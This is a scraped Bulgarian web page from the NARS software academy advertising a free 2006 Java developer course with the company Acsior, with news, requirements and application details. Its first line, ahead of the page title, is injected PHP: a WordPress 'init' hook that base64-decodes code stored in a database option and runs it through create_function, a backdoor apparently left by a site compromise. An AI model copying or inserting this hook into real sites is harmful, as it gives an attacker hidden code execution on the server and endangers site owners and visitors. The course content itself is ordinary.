add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Acsior - НАРС

Безплатно обучение на Java програмисти за фирма Acsior!

Новини

 • Курсът за обучение на екип от 13 софтуерни инженера по специалност "Core Java Developer" за фирма Acsior приключи успешно. Всички курсисти (с изключение на отпадналите в началото на курса) завършиха с отлични резултати и започнаха работа по специалността при новия си работодател. Повече информация за завършилите можете да намерите в страницата на випуска.
 • След първия изпит от курса "Core Java Developer" отпаднаха 3 души
 • Започна втората фаза на обучението на софтуерни специалисти за работа във фирма Acsior. След проведените изпити за завършване на първата фаза и проведените интервюта с работодателя, за обучение бяха одобрени 16 души, които подписаха своя трудов договор. Предстои двумесечен целодневен курс, по време на който одобрените кандидати ще усвояват основите на професията "Java софтуерен разработчик". По време на обучението те получават заплата по силата на трудовия си договор. Публикуван е списъкът на започналите работа и обучение студенти.
 • Проведен е финален изпит за завършване на първия етап от безплатния курс за обучение на Java разработчици за работа във фирма Acsior.
 • След проведените приемни изпити и интервюта е публикуван списък с одобрените кандидати за участие в първия етап от безплатния курс за обучение на Java разработчици, организиран от НАРС и Acsior.

За обучението

Национална академия по разработка на софтуер (НАРС) и софтуерната компания Acsior организират безплатно обучение за Java програмисти. Целта на обучението е да се помогне на млади хора да навлязат в професията "софтуерен инженер" като им се осигури специализирана подготовка и работа в сериозна софтуерна компания. Обучението се провежда в два етапа::

Плащаме ви за да учите!!

Най-добрите 14-17 студента, които завършат безплатния курс за начинаещи "Въведение в програмирането с Java", получават дългосрочен трудов договор с фирмата Acsior + безплатно обучение в следващото ниво "Core Java Developer" + месечна парична стипендия за периода на обучение. Курсът "Core Java Developer" е целодневен, с продължителност 2 месеца и обхваща практическия аспект на всички по-важни технологии, които един съвременен Java софтуерен разработчик трябва да владее: основи на езика и платформата Java 5 SE, стандартни библиотеки, обектно-ориентирано програмиране, релационни бази от данни (Oracle), разработка на Интернет и уеб приложения (Servlets / JSP / JSTL / Tomcat) и разработка на приложения с графичен потребителски интерфейс (AWT / Swing).

Изисквания към кандидатите

Кандидатите трябва да отговарят на следните условия:

 • да са студенти във втори или по-горен курс или вече да са завършили
 • да имат възможност и желание да работят поне 6 часа на ден (за предпочитане 8 ) в дългосрочен план
 • да имат голямо желание за развитие в областта на програмирането и разработката на софтуер
 • да владеят писмено английски език
 • да имат компютърна грамотност

Умения по програмиране не се изискват! Предимства биха могли да бъдат следните фактори:

 • завършено висше образование в ИТ специалност
 • предишен опит с програмирането
 • отличия от конкурси, олимпиади и състезания

Прием

Приемът в курсовете се извършва чрез входящ тест за интелигентност + индивидуално интервю с представители на НАРС и работодателя.

Кандидатстване

За участие в безплатното обучение и да работа в софтуерната компания Acsior, трябва да изпратите на адрес office@nars.bg следната информация:

За повече информация може да се свържете с нас.

Разписание и краен срок

Приемният изпит беше проведен през юни, 2006 г. Курсовете се провеждат през лятото на 2006 г.

Форум за дискусии

Ако имате въпроси и коментари, свързани с настоящата програма за безплатно обучение, споделете ги във форума.

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad